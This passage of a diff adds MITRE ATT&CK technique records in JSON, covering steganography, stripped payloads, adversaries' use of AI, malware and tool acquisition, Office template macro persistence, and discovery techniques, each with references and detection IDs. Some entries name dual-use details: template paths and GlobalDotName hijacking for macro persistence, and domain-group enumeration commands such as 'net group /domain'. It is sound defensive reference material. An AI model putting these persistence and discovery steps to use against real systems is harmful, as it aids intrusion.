+                            "description": "Kafka, F. (2018, January). ESET's Guide to Deobfuscating and Devirtualizing FinFisher. Retrieved August 12, 2019.",
+                            "url": "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Filip Kafka, ESET"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2026-04-15 22:15:31.610000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0023: Obfuscated Binary Unpacking Detection via Behavioral Patterns"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-05 14:28:16.719000+00:00",
+                    "modified": "2026-05-12 15:12:00.714000+00:00",
+                    "name": "Steganography",
+                    "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a threat group used\u202f<code>Invoke-PSImage</code>\u202fto hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)  ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/003",
+                            "external_id": "T1027.003"
+                        },
+                        {
+                            "source_name": "McAfee Malicious Doc Targets Pyeongchang Olympics",
+                            "description": "Saavedra-Morales, J., Sherstobitoff, R. (2018, January 6). Malicious Document Targets Pyeongchang Olympics. Retrieved April 10, 2018.",
+                            "url": "https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/"
+                        },
+                        {
+                            "source_name": "Wikipedia Duqu",
+                            "description": "Wikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018.",
+                            "url": "https://en.wikipedia.org/wiki/Duqu"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.714000+00:00\", \"old_value\": \"2026-04-15 22:21:09.201000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0119: Detection Strategy for Steganographic Abuse in File & Script Execution"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-09-29 18:30:12.244000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "Stripped Payloads",
+                    "description": "Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system\u2019s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018)\n\nAdversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.(Citation: SentinelLabs reversing run-only applescripts 2021)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/008",
+                            "external_id": "T1027.008"
+                        },
+                        {
+                            "source_name": "intezer stripped binaries elf files 2018",
+                            "description": "Ignacio Sanmillan. (2018, February 7). Executable and Linkable Format 101. Part 2: Symbols. Retrieved September 29, 2022.",
+                            "url": "https://www.intezer.com/blog/malware-analysis/executable-linkable-format-101-part-2-symbols/"
+                        },
+                        {
+                            "source_name": "SentinelLabs reversing run-only applescripts 2021",
+                            "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022.",
+                            "url": "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/"
+                        },
+                        {
+                            "source_name": "Mandiant golang stripped binaries explanation",
+                            "description": "STEPHEN ECKELS. (2022, February 28). Ready, Set, Go \u2014 Golang Internals and Symbol Recovery. Retrieved September 29, 2022.",
+                            "url": "https://www.mandiant.com/resources/blog/golang-internals-symbol-recovery"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2026-04-15 22:21:58.918000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0019: Detection Strategy for Stripped Payloads Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--0cc222f5-c3ff-48e6-9f52-3314baf9d37e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-03-11 13:37:31.836000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Artificial Intelligence",
+                    "description": "Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks, including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI) \n\nFor example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI) Finally, AI-generated text, images, audio, and video may be used for fraud, [Impersonation](https://attack.mitre.org/techniques/T1684/001), and other malicious activities.(Citation: Google-Vishing24)(Citation: IC3-AI24)(Citation: WSJ-Vishing-AI24)\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1588/007",
+                            "external_id": "T1588.007"
+                        },
+                        {
+                            "source_name": "WSJ-Vishing-AI24",
+                            "description": "Catherine Stupp. (2019, August 30). Fraudsters Used AI to Mimic CEO\u2019s Voice in Unusual Cybercrime Case. Retrieved March 18, 2025.",
+                            "url": "https://www.wsj.com/articles/fraudsters-use-ai-to-mimic-ceos-voice-in-unusual-cybercrime-case-11567157402"
+                        },
+                        {
+                            "source_name": "Google-Vishing24",
+                            "description": "Emily Astranova, Pascal Issa. (2024, July 23). Whose Voice Is It Anyway? AI-Powered Voice Spoofing for Next-Gen Vishing Attacks. Retrieved March 18, 2025.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/ai-powered-voice-spoofing-vishing-attacks"
+                        },
+                        {
+                            "source_name": "IC3-AI24",
+                            "description": "IC3. (2024, December 3). Criminals Use Generative Artificial Intelligence to Facilitate Financial Fraud. Retrieved March 18, 2025.",
+                            "url": "https://www.ic3.gov/PSA/2024/PSA241203"
+                        },
+                        {
+                            "source_name": "MSFT-AI",
+                            "description": "Microsoft Threat Intelligence. (2024, February 14). Staying ahead of threat actors in the age of AI. Retrieved March 11, 2024.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/"
+                        },
+                        {
+                            "source_name": "OpenAI-CTI",
+                            "description": "OpenAI. (2024, February 14). Disrupting malicious uses of AI by state-affiliated threat actors. Retrieved September 12, 2024.",
+                            "url": "https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Menachem Goldstein"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2026-04-17 16:06:03.711000+00:00\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0842: Detection of Artificial Intelligence"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-01 02:06:11.499000+00:00",
+                    "modified": "2026-05-12 15:12:00.643000+00:00",
+                    "name": "Malware",
+                    "description": "Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.\n\nIn addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1588/001",
+                            "external_id": "T1588.001"
+                        },
+                        {
+                            "source_name": "FireEyeSupplyChain",
+                            "description": "FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye. Retrieved March 6, 2017.",
+                            "url": "https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.643000+00:00\", \"old_value\": \"2025-10-24 17:48:58.766000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0845: Detection of Malware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-01 02:08:33.977000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Tool",
+                    "description": "Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). \n\nAdversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. Tools may also be leveraged for testing \u2013 for example, evaluating malware against commercial antivirus or endpoint detection and response (EDR) applications.(Citation: Forescout Conti Leaks 2022)(Citation: Sentinel Labs Top Tier Target 2025)\n\nTool acquisition may involve the procurement of commercial software licenses, including for red teaming tools such as Cobalt Strike. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries). Threat actors may also crack trial versions of software.(Citation: Recorded Future Beacon 2019)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1588/002",
+                            "external_id": "T1588.002"
+                        },
+                        {
+                            "source_name": "Sentinel Labs Top Tier Target 2025",
+                            "description": " Tom Hegel, Aleksandar Milenkoski & Jim Walter. (2025, April 28). Top Tier Target | What It Takes to Defend a Cybersecurity Company from Today\u2019s Adversaries. Retrieved May 22, 2025.",
+                            "url": "https://www.sentinelone.com/labs/top-tier-target-what-it-takes-to-defend-a-cybersecurity-company-from-todays-adversaries/"
+                        },
+                        {
+                            "source_name": "Analyzing CS Dec 2020",
+                            "description": "Maynier, E. (2020, December 20). Analyzing Cobalt Strike for Fun and Profit. Retrieved October 12, 2021.",
+                            "url": "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/"
+                        },
+                        {
+                            "source_name": "Recorded Future Beacon 2019",
+                            "description": "Recorded Future. (2019, June 20). Out of the Blue: How Recorded Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.",
+                            "url": "https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers"
+                        },
+                        {
+                            "source_name": "Forescout Conti Leaks 2022",
+                            "description": "Vedere Labs. (2022, March 11). Analysis of Conti Leaks. Retrieved May 22, 2025.",
+                            "url": "https://www.forescout.com/resources/analysis-of-conti-leaks/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "SOCCRATES",
+                        "Mnemonic AS",
+                        "Menachem Goldstein"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2025-10-24 17:49:10.900000+00:00\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0852: Detection of Tool"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-11-07 20:29:17.788000+00:00",
+                    "modified": "2026-05-12 15:12:00.643000+00:00",
+                    "name": "Office Template Macros",
+                    "description": "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) \n\nWord Normal.dotm location:<br>\n<code>C:\\Users\\&lt;username&gt;\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm</code>\n\nExcel Personal.xlsb location:<br>\n<code>C:\\Users\\&lt;username&gt;\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB</code>\n\nAdversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under <code>C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\</code>, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) \n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1137/001",
+                            "external_id": "T1137.001"
+                        },
+                        {
+                            "source_name": "MSDN VBA in Office",
+                            "description": "Austin, J. (2017, June 6). Getting Started with VBA in Office. Retrieved July 3, 2017.",
+                            "url": "https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office"
+                        },
+                        {
+                            "source_name": "Hexacorn Office Template Macros",
+                            "description": "Hexacorn. (2017, April 17). Beyond good ol\u2019 Run key, Part 62. Retrieved July 3, 2017.",
+                            "url": "http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/"
+                        },
+                        {
+                            "source_name": "Microsoft Change Normal Template",
+                            "description": "Microsoft. (n.d.). Change the Normal template (Normal.dotm). Retrieved July 3, 2017.",
+                            "url": "https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea"
+                        },
+                        {
+                            "source_name": "enigma0x3 normal.dotm",
+                            "description": "Nelson, M. (2014, January 23). Maintaining Access with normal.dotm. Retrieved July 3, 2017.",
+                            "url": "https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/"
+                        },
+                        {
+                            "source_name": "CrowdStrike Outlook Forms",
+                            "description": "Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral Movement and Persistence. Retrieved February 5, 2019.",
+                            "url": "https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746"
+                        },
+                        {
+                            "source_name": "GlobalDotName Jun 2019",
+                            "description": "Shukrun, S. (2019, June 2). Office Templates and GlobalDotName - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.",
+                            "url": "https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique"
+                        },
+                        {
+                            "source_name": "Outlook Today Home Page",
+                            "description": "Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019.",
+                            "url": "https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Office Suite",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.643000+00:00\", \"old_value\": \"2025-10-24 17:48:59.432000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0519: Detect Persistence via Office Template Macro Injection or Registry Hijack"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:28.471000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "Peripheral Device Discovery",
+                    "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1120",
+                            "external_id": "T1120"
+                        },
+                        {
+                            "source_name": "Peripheral Discovery Linux",
+                            "description": "Shahriar Shovon. (2018, March). List USB Devices Linux. Retrieved March 11, 2022.",
+                            "url": "https://linuxhint.com/list-usb-devices-linux/"
+                        },
+                        {
+                            "source_name": "Peripheral Discovery macOS",
+                            "description": "SS64. (n.d.). system_profiler. Retrieved March 11, 2022.",
+                            "url": "https://ss64.com/osx/system_profiler.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2025-10-24 17:48:37.563000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0491: Peripheral Device Enumeration via System Utilities and API Calls"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-21 21:15:06.561000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "Domain Groups",
+                    "description": "Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n\nCommands such as <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility,  <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain-level groups.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1069/002",
+                            "external_id": "T1069.002"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Harshal Tupsamudre, Qualys",
+                        "Miriam Wiesner, @miriamxyra, Microsoft Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2025-10-24 17:48:33.946000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
